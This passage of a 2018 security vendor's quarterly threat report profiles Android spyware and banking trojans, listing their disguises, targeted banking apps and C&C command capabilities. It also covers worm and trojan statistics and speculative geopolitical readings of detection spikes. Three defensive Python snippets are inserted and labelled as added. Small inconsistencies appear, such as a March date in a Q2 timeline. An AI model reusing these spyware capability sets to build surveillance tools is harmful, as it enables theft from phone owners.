Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contacts details

Set Wi-Fi always on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service


Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it "a spy with a 007 license".

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

Send_SMS: extract SMS content and send it to the C&C server

Send_USSD: send the USSD to the C&C server

Gethistory: monitor browser history

Start_AllApp: gather info about installed applications

Send_call: set the Intent action to call

Forward_call: forward incoming calls

ResForward_call: reset call forwarding

Go_Smsmnd: delete SMS content

Go_GetAlls: get SMS history

Dell_sms: delete SMS content in a conversation

Send_spam: send spam SMS

Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp

Here are some commands from its Command and Control server:

contacts - Get contact details and email id

Mute - Set action to mute

Mms - Get MMS content

info - Get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber

Version 2: Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton


شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.

After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version 1: Netflix Hack, Instagram Hack

Version 2: TSF Launcher

Version 3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

[Chart: Android-targeted malware in April]

4.2.2 May 2018

[Chart: Android-targeted malware in May]

4.2.3 June 2018

[Chart: Android-targeted malware in June]

5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm, by far, was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
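To make the section's point about packing concrete, here is an added Python example (not from the report, and not Comodo's or UPX's code) showing the two cheapest triage signals a defender checks for UPX-style packing: the UPX0/UPX1 section names that the stock packer leaves behind, and the near-8-bits-per-byte entropy of a compressed section compared with ordinary code. The section tables are constructed stand-ins for what a PE parser would return; the 7.2 entropy threshold and the section-name list are assumptions.

```python
"""Heuristics for spotting packed Windows executables.

Added example for the Packers section: not code from the report. Section
tables are constructed, and the name list and threshold are assumptions.
"""
import math
import random
from collections import Counter
from typing import Dict, List, Sequence, Tuple

# Section names left by the stock UPX packer. Modified builds often rename
# them, which is why entropy is checked as well.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
# Compressed or encrypted data sits close to 8 bits/byte; plain x86 code and
# text usually fall well below. 7.2 is an assumed triage threshold.
HIGH_ENTROPY = 7.2
MIN_SECTION_BYTES = 512  # tiny high-entropy blobs (icons, certs) are not evidence


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant data, at most 8.0."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def packing_verdict(sections: Sequence[Tuple[str, bytes]]) -> Dict[str, object]:
    """Return per-section entropy plus the reasons a sample looks packed."""
    reasons: List[str] = []
    entropies: Dict[str, float] = {}
    for name, raw in sections:
        clean = name.rstrip("\x00")  # PE section names are NUL-padded to 8 bytes
        ent = shannon_entropy(raw)
        entropies[clean] = round(ent, 2)
        if clean in PACKER_SECTION_NAMES:
            reasons.append(f"packer section name {clean!r}")
        if ent >= HIGH_ENTROPY and len(raw) >= MIN_SECTION_BYTES:
            reasons.append(f"high entropy {ent:.2f} in {clean!r}")
    return {"packed": bool(reasons), "reasons": reasons, "entropy": entropies}


def _pseudo_compressed(size: int, seed: int = 7) -> bytes:
    """Deterministic high-entropy bytes standing in for a compressed section."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(size))


def _pseudo_code(size: int) -> bytes:
    """Low-entropy bytes standing in for ordinary code (a repeating opcode pattern)."""
    pattern = b"\x90\x90\x8b\x45\xfc\x89\x45\xf8\xc3\x00\x00\x00"
    return (pattern * (size // len(pattern) + 1))[:size]


# Constructed section tables, not taken from any real sample.
PLAIN_BINARY = [(".text\x00\x00\x00", _pseudo_code(4096)),
                (".data\x00\x00\x00", b"\x00" * 1024)]
UPX_LIKE = [("UPX0\x00\x00\x00\x00", b""),
            ("UPX1\x00\x00\x00\x00", _pseudo_compressed(4096))]
RENAMED_PACKER = [(".text\x00\x00\x00", _pseudo_compressed(4096, seed=3))]

if __name__ == "__main__":
    for label, table in (("plain", PLAIN_BINARY), ("upx", UPX_LIKE), ("renamed", RENAMED_PACKER)):
        verdict = packing_verdict(table)
        print(label, verdict["packed"], verdict["entropy"], verdict["reasons"])
```

The third table is the MUPX case the text alludes to: the section names have been changed, so only the entropy signal remains, which is why a triage rule should never rely on names alone.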

In Q2 2018 Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
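The "over ten times the usual" reading used for this spike, and for the other country timelines in this section, can be turned into a repeatable check. The following Python function is an added example, not the report's or Comodo's method: it runs over a constructed daily detection series, uses a trailing median of the preceding days as the baseline so that a spike does not inflate its neighbours' baseline, and flags days at or above a chosen multiple of it. The dates and counts are invented.

```python
"""Flag days whose malware-detection count stands out from the baseline.

Added example for the country timelines: not code from the report. The
daily series below is constructed; the window, ratio and floor are
assumed defaults a SOC would tune per data source.
"""
from datetime import date, timedelta
from statistics import median
from typing import Dict, List, Sequence, Tuple


def spikes(series: Sequence[Tuple[date, int]], window: int = 7,
           ratio: float = 10.0, min_count: int = 50) -> List[Dict[str, object]]:
    """Return days whose count is >= ratio * trailing median of the previous `window` days.

    A trailing median (not a mean over the whole quarter) keeps one outlier
    from raising the baseline for the days after it. `min_count` is an absolute
    floor so that a baseline near zero does not make 5 detections look like a spike.
    """
    flagged: List[Dict[str, object]] = []
    for i in range(window, len(series)):
        day, count = series[i]
        baseline = median([c for _, c in series[i - window:i]])
        if baseline <= 0:
            continue  # no usable baseline; a separate rule should handle cold starts
        if count >= min_count and count >= ratio * baseline:
            flagged.append({
                "day": day.isoformat(),
                "count": count,
                "baseline": baseline,
                "factor": round(count / baseline, 1),
            })
    return flagged


def build_sample() -> List[Tuple[date, int]]:
    """Constructed daily detection counts for one country, 2018-04-15 to 2018-05-14."""
    start = date(2018, 4, 15)
    counts = [12, 9, 14, 11, 13, 10, 12, 15, 11, 9, 13, 12, 10, 14, 11, 12, 13, 9,
              160,  # 2018-05-03: well over ten times the usual daily count
              40, 12, 11, 13, 10, 12, 14, 11, 9, 12, 13]
    return [(start + timedelta(days=i), c) for i, c in enumerate(counts)]


if __name__ == "__main__":
    for hit in spikes(build_sample()):
        print(f"{hit['day']}: {hit['count']} detections, {hit['factor']}x the trailing median {hit['baseline']}")
```

Lowering `ratio` to 3 with the default floor still flags only May 3, because the 40 on May 4 sits under `min_count`; lowering the floor as well flags May 4 too. That pair of knobs is the difference between a report-worthy spike and ordinary day-to-day noise.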


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarus society.

77 Iraq

Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility."


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
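The country timelines in this section are read by eye for jumps like the "well over ten times the usual" spike described for North Korea. The Python below is added here as an illustration of how such days can be flagged automatically; it is not Comodo's analysis code, and the daily counts are constructed sample numbers rather than Comodo's data. It builds the baseline from the median and the median absolute deviation (MAD), so that the spike itself does not inflate the baseline, and reports days that are both a large multiple of the median and far outside the normal day-to-day spread.

```python
from statistics import median

# Constructed daily detection counts for one country (illustrative numbers,
# not Comodo's data): a flat baseline with a single one-day spike.
SAMPLE_COUNTS = [
    ("2018-04-28", 118), ("2018-04-29", 125), ("2018-04-30", 121),
    ("2018-05-01", 130), ("2018-05-02", 117), ("2018-05-03", 1590),
    ("2018-05-04", 128), ("2018-05-05", 122), ("2018-05-06", 119),
]


def robust_baseline(counts):
    """Return (median, MAD) for a list of counts.

    The median absolute deviation is used instead of mean/stddev because a
    single outlier would otherwise inflate the baseline and hide itself.
    """
    med = median(counts)
    mad = median(abs(c - med) for c in counts)
    return med, mad


def find_spikes(series, ratio=10.0, mad_threshold=5.0):
    """Flag days whose count is at least `ratio` times the median and more
    than `mad_threshold` scaled MADs above it.

    `series` is a list of (date, count). Returns [(date, count, multiple)].
    """
    counts = [c for _, c in series]
    med, mad = robust_baseline(counts)
    # 1.4826 * MAD estimates sigma for normally distributed data; guard a
    # perfectly flat series where the MAD would be zero.
    scale = 1.4826 * mad if mad > 0 else 1.0
    spikes = []
    for date, count in series:
        multiple = count / med if med else float("inf")
        deviation = (count - med) / scale
        if multiple >= ratio and deviation > mad_threshold:
            spikes.append((date, count, round(multiple, 1)))
    return spikes


if __name__ == "__main__":
    for date, count, multiple in find_spikes(SAMPLE_COUNTS):
        print(f"{date}: {count} detections, {multiple}x the median")
```

The two thresholds are deliberately separate: the ratio catches the kind of order-of-magnitude jump the text describes, while the MAD test keeps a noisy but low-volume country from tripping on small absolute changes. Flagging a day is only the first step; as the North Korea paragraph shows, the next one is to look at what the detections on that day actually were.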


8 Conclusions

In Q2, Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

Visit comodo.com

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, +1 (888) 266 6361. Int: +1 (703) 581 6361. Fax: +1 (973) 777 4394. sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800. www.comodo.co.in

© 2018 All Rights Reserved. Comodo Security Solutions, Inc.

